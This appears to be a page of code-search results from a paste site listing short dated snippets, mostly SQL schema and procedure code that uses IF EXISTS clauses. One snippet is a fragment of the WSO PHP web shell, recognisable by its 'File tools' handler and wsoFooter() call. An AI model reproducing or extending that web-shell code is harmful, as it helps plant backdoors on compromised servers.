42.7K results in 819 ms
8 years ago · May 29, 2018, 06:24 PM
endtime -- data that is not in booking table yet. if @notUsedBefore > 0 begin select
8 years ago · May 29, 2018, 05:36 PM
wszystkie klucze obce. --(UŻYCIE IF EXISTS) CREATE PROCEDURE usun_klucze_obce AS BEGIN
8 years ago · May 29, 2018, 05:26 PM
/* up.sql */ CREATE TABLE IF NOT EXISTS "conspiracies" ( "page_id" TEXT PRIMARY KEY, "title" TEXT, "summary" TEXT, "content" TEXT, "background" TEXT );
8 years ago · May 29, 2018, 05:20 PM
statement changed 0 rows: CREATE TABLE IF NOT EXISTS `items` (`id` INTEGER PRIMARY
8 years ago · May 29, 2018, 05:10 PM
set @name = @prologue + @indexstring if not exists (select value from dtproperties
8 years ago · May 29, 2018, 04:52 PM
25, true); DROP TABLE IF EXISTS "public"."player_topup_seq"; CREATE TABLE "public"."player_topup" ( "id" int8 DEFAULT nextval('contas_seq'::regclass) NOT NULL , "player_id" int8, "item_id"
8 years ago · May 29, 2018, 03:54 PM
DROP PROCEDURE IF EXISTS getAllCategoriesRecursive; DELIMITER $$ CREATE PROCEDURE getAllCategoriesRecursive (IN parentID
8 years ago · May 29, 2018, 03:16 PM
statement changed 0 rows: CREATE TABLE IF NOT EXISTS `items` (`id` INTEGER PRIMARY
8 years ago · May 29, 2018, 02:52 PM
by same manufacturer alter table Printer add constraint model_price_relationship check ( NOT EXISTS (SELECT * FROM Printer p1,
8 years ago · May 29, 2018, 02:34 PM
by same manufacturer alter table Printer add constraint model_price_relationship check ( NOT EXISTS (SELECT * FROM Printer p1,
8 years ago · May 29, 2018, 02:30 PM
de view `vw_checkgovpw` -- DROP TABLE IF EXISTS `vw_checkgovpw`; CREATE ALGORITHM=UNDEFINED DEFINER=`root`@`localhost` SQL SECURITY
8 years ago · May 29, 2018, 02:16 PM
static final String CREATE_PORT_INDEX = "CREATE INDEX IF NOT EXISTS idx_ports_port ON " + PORT_TABLE + " (" + PORT_FIELD
8 years ago · May 29, 2018, 02:10 PM
AND password.tenant_id = '%{control:PacketFence-Tenant-Id}' AND NOT EXISTS (SELECT pid FROM activation
8 years ago · May 29, 2018, 01:28 PM
socket(s). The group must not already # exists in /etc/group before setting
8 years ago · May 29, 2018, 01:24 PM
for table `attached` -- DROP TABLE IF EXISTS `attached`; /*!40101 SET @saved_cs_client
8 years ago · May 29, 2018, 01:16 PM
call update_tables_aux(); DROP EVENT IF EXISTS run_update_tables_aux; DELIMITER // CREATE DEFINER=`root`@`%` EVENT `run_update_tables_aux` ON
8 years ago · May 29, 2018, 01:14 PM
copy_tables($S,$Og,$Yf){queries("SET sql_mode = 'NO_AUTO_VALUE_ON_ZERO'");foreach($S as$Q){$F=($Yf==DB?table("copy_$Q"):idf_escape($Yf).".".table($Q));if(!queries("\nDROP TABLE IF EXISTS $F")||!queries("CREATE TABLE $F LIKE
8 years ago · May 29, 2018, 01:02 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · May 29, 2018, 12:58 PM
Return-Path) of the message. If not empty, * will be sent
Total pages: 2134